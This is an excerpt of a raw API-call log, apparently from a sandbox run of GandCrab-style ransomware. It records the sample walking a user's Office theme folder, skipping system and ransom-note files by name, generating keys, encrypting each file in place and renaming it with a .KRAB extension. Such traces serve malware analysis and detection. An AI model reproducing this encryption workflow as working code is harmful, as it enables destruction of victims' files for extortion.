0x2f60000 [0066.463] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0066.463] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0066.465] CryptGenRandom (in: hProv=0xfbb440, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0066.465] CryptReleaseContext (hProv=0xfbb440, dwFlags=0x0) returned 1 [0066.465] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.466] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbbdd0) returned 1 [0066.467] CryptImportKey (in: hProv=0xfbbdd0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbd2e0) returned 1 [0066.467] CryptGetKeyParam (in: hKey=0xfbd2e0, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0066.467] CryptEncrypt (in: hKey=0xfbd2e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0066.467] GetLastError () returned 0x0 [0066.467] CryptDestroyKey (hKey=0xfbd2e0) returned 1 [0066.467] CryptReleaseContext (hProv=0xfbbdd0, dwFlags=0x0) returned 1 [0066.468] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbc078) returned 1 [0066.499] CryptImportKey (in: hProv=0xfbc078, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbd6a0) returned 1 [0066.499] CryptGetKeyParam (in: hKey=0xfbd6a0, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0066.499] CryptEncrypt (in: hKey=0xfbd6a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0066.501] GetLastError () returned 0x0 [0066.501] CryptDestroyKey (hKey=0xfbd6a0) returned 1 [0066.501] CryptReleaseContext (hProv=0xfbc078, dwFlags=0x0) returned 1 [0066.501] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457515[[fn=View]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457515[[fn=view]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0066.501] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0066.503] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0066.504] ReadFile (in: hFile=0x488, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0x76cc4, lpOverlapped=0x0) returned 1 [0066.598] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0xfff8933c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.598] WriteFile (in: hFile=0x488, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x76cc4, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0x76cc4, lpOverlapped=0x0) returned 1 [0066.599] WriteFile (in: hFile=0x488, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0066.599] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.604] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.606] CloseHandle (hObject=0x488) returned 1 [0066.622] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.622] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457515[[fn=View]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457515[[fn=view]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457515[[fn=View]].thmx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457515[[fn=view]].thmx.krab")) returned 1 [0066.623] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.623] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0066.623] lstrcmpW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2=".") returned 1 [0066.623] lstrcmpW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2="..") returned 1 [0066.623] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM04033917[[fn=Berlin]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033917[[fn=Berlin]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033917[[fn=Berlin]].thmx" [0066.623] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0066.624] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033917[[fn=Berlin]].thmx.KRAB") returned 135 [0066.624] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033917[[fn=Berlin]].thmx") returned 130 [0066.624] lstrlenW (lpString=".thmx") returned 5 [0066.624] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0066.641] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".thmx ") returned 6 [0066.642] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.642] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033917[[fn=Berlin]].thmx") returned 130 [0066.642] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033917[[fn=Berlin]].thmx") returned 130 [0066.642] lstrcmpiW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2="desktop.ini") returned 1 [0066.642] lstrcmpiW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2="autorun.inf") returned 1 [0066.642] lstrcmpiW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2="ntuser.dat") returned 1 [0066.642] lstrcmpiW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2="iconcache.db") returned 1 [0066.642] lstrcmpiW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2="bootsect.bak") returned 1 [0066.642] lstrcmpiW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2="boot.ini") returned 1 [0066.642] lstrcmpiW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2="ntuser.dat.log") returned 1 [0066.642] lstrcmpiW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2="thumbs.db") returned 1 [0066.642] lstrcmpiW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0066.642] lstrcmpiW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0066.642] lstrcmpiW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0066.642] lstrcmpiW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2="ntldr") returned 1 [0066.642] lstrcmpiW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2="NTDETECT.COM") returned 1 [0066.642] lstrcmpiW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2="Bootfont.bin") returned 1 [0066.643] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0066.643] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbb880) returned 1 [0066.643] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0066.644] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0066.644] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0066.644] CryptGenRandom (in: hProv=0xfbb880, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0066.644] CryptReleaseContext (hProv=0xfbb880, dwFlags=0x0) returned 1 [0066.644] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.644] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbb880) returned 1 [0066.645] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0066.649] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0066.649] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0066.649] CryptGenRandom (in: hProv=0xfbb880, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0066.649] CryptReleaseContext (hProv=0xfbb880, dwFlags=0x0) returned 1 [0066.649] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.650] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbbbb0) returned 1 [0066.650] CryptImportKey (in: hProv=0xfbbbb0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbdce0) returned 1 [0066.650] CryptGetKeyParam (in: hKey=0xfbdce0, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0066.650] CryptEncrypt (in: hKey=0xfbdce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0066.651] GetLastError () returned 0x0 [0066.651] CryptDestroyKey (hKey=0xfbdce0) returned 1 [0066.651] CryptReleaseContext (hProv=0xfbbbb0, dwFlags=0x0) returned 1 [0066.651] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbb2a8) returned 1 [0066.651] CryptImportKey (in: hProv=0xfbb2a8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbdce0) returned 1 [0066.651] CryptGetKeyParam (in: hKey=0xfbdce0, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0066.651] CryptEncrypt (in: hKey=0xfbdce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0066.652] GetLastError () returned 0x0 [0066.652] CryptDestroyKey (hKey=0xfbdce0) returned 1 [0066.652] CryptReleaseContext (hProv=0xfbb2a8, dwFlags=0x0) returned 1 [0066.652] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033917[[fn=Berlin]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033917[[fn=berlin]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0066.661] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0066.661] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0066.662] ReadFile (in: hFile=0x440, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0xee481, lpOverlapped=0x0) returned 1 [0066.867] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0xfff11b7f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.867] WriteFile (in: hFile=0x440, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0xee481, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0xee481, lpOverlapped=0x0) returned 1 [0066.869] WriteFile (in: hFile=0x440, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0066.870] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.873] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.898] CloseHandle (hObject=0x440) returned 1 [0066.926] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.926] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033917[[fn=Berlin]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033917[[fn=berlin]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033917[[fn=Berlin]].thmx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033917[[fn=berlin]].thmx.krab")) returned 1 [0066.927] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.927] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0066.928] lstrcmpW (lpString1="TM04033919[[fn=Circuit]].thmx", lpString2=".") returned 1 [0066.928] lstrcmpW (lpString1="TM04033919[[fn=Circuit]].thmx", lpString2="..") returned 1 [0066.928] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM04033919[[fn=Circuit]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033919[[fn=Circuit]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033919[[fn=Circuit]].thmx" [0066.928] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0066.928] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033919[[fn=Circuit]].thmx.KRAB") returned 136 [0066.928] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033919[[fn=Circuit]].thmx") returned 131 [0066.928] lstrlenW (lpString=".thmx") returned 5 [0066.928] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0066.928] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".thmx ") returned 6 [0066.928] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.929] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033919[[fn=Circuit]].thmx") returned 131 [0066.929] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033919[[fn=Circuit]].thmx") returned 131 [0066.929] lstrcmpiW (lpString1="TM04033919[[fn=Circuit]].thmx", lpString2="desktop.ini") returned 1 [0066.929] lstrcmpiW (lpString1="TM04033919[[fn=Circuit]].thmx", lpString2="autorun.inf") returned 1 [0066.929] lstrcmpiW (lpString1="TM04033919[[fn=Circuit]].thmx", lpString2="ntuser.dat") returned 1 [0066.929] lstrcmpiW (lpString1="TM04033919[[fn=Circuit]].thmx", lpString2="iconcache.db") returned 1 [0066.929] lstrcmpiW (lpString1="TM04033919[[fn=Circuit]].thmx", lpString2="bootsect.bak") returned 1 [0066.929] lstrcmpiW (lpString1="TM04033919[[fn=Circuit]].thmx", lpString2="boot.ini") returned 1 [0066.929] lstrcmpiW (lpString1="TM04033919[[fn=Circuit]].thmx", lpString2="ntuser.dat.log") returned 1 [0066.929] lstrcmpiW (lpString1="TM04033919[[fn=Circuit]].thmx", lpString2="thumbs.db") returned 1 [0066.929] lstrcmpiW (lpString1="TM04033919[[fn=Circuit]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0066.929] lstrcmpiW (lpString1="TM04033919[[fn=Circuit]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0066.929] lstrcmpiW (lpString1="TM04033919[[fn=Circuit]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0066.929] lstrcmpiW (lpString1="TM04033919[[fn=Circuit]].thmx", lpString2="ntldr") returned 1 [0066.929] lstrcmpiW (lpString1="TM04033919[[fn=Circuit]].thmx", lpString2="NTDETECT.COM") returned 1 [0066.929] lstrcmpiW (lpString1="TM04033919[[fn=Circuit]].thmx", lpString2="Bootfont.bin") returned 1 [0066.929] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0066.930] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbb198) returned 1 [0066.930] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0066.931] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0066.931] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0066.931] CryptGenRandom (in: hProv=0xfbb198, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0066.931] CryptReleaseContext (hProv=0xfbb198, dwFlags=0x0) returned 1 [0066.931] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.931] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbb330) returned 1 [0066.932] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0066.932] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0066.932] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0066.932] CryptGenRandom (in: hProv=0xfbb330, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0066.932] CryptReleaseContext (hProv=0xfbb330, dwFlags=0x0) returned 1 [0066.932] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.933] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbb2a8) returned 1 [0066.933] CryptImportKey (in: hProv=0xfbb2a8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbdce0) returned 1 [0066.933] CryptGetKeyParam (in: hKey=0xfbdce0, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0066.933] CryptEncrypt (in: hKey=0xfbdce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0066.934] GetLastError () returned 0x0 [0066.934] CryptDestroyKey (hKey=0xfbdce0) returned 1 [0066.934] CryptReleaseContext (hProv=0xfbb2a8, dwFlags=0x0) returned 1 [0066.934] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbb990) returned 1 [0066.934] CryptImportKey (in: hProv=0xfbb990, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbdce0) returned 1 [0066.934] CryptGetKeyParam (in: hKey=0xfbdce0, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0066.934] CryptEncrypt (in: hKey=0xfbdce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0066.935] GetLastError () returned 0x0 [0066.935] CryptDestroyKey (hKey=0xfbdce0) returned 1 [0066.935] CryptReleaseContext (hProv=0xfbb990, dwFlags=0x0) returned 1 [0066.935] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033919[[fn=Circuit]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033919[[fn=circuit]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0066.953] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0066.953] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0066.954] ReadFile (in: hFile=0x440, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0x100000, lpOverlapped=0x0) returned 1 [0067.068] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.068] WriteFile (in: hFile=0x440, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0x100000, lpOverlapped=0x0) returned 1 [0067.070] ReadFile (in: hFile=0x440, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0x65552, lpOverlapped=0x0) returned 1 [0067.093] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0xfff9aaae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.093] WriteFile (in: hFile=0x440, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x65552, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0x65552, lpOverlapped=0x0) returned 1 [0067.094] WriteFile (in: hFile=0x440, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0067.094] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.114] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.118] CloseHandle (hObject=0x440) returned 1 [0067.175] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.175] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033919[[fn=Circuit]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033919[[fn=circuit]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033919[[fn=Circuit]].thmx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033919[[fn=circuit]].thmx.krab")) returned 1 [0067.176] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.176] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0067.176] 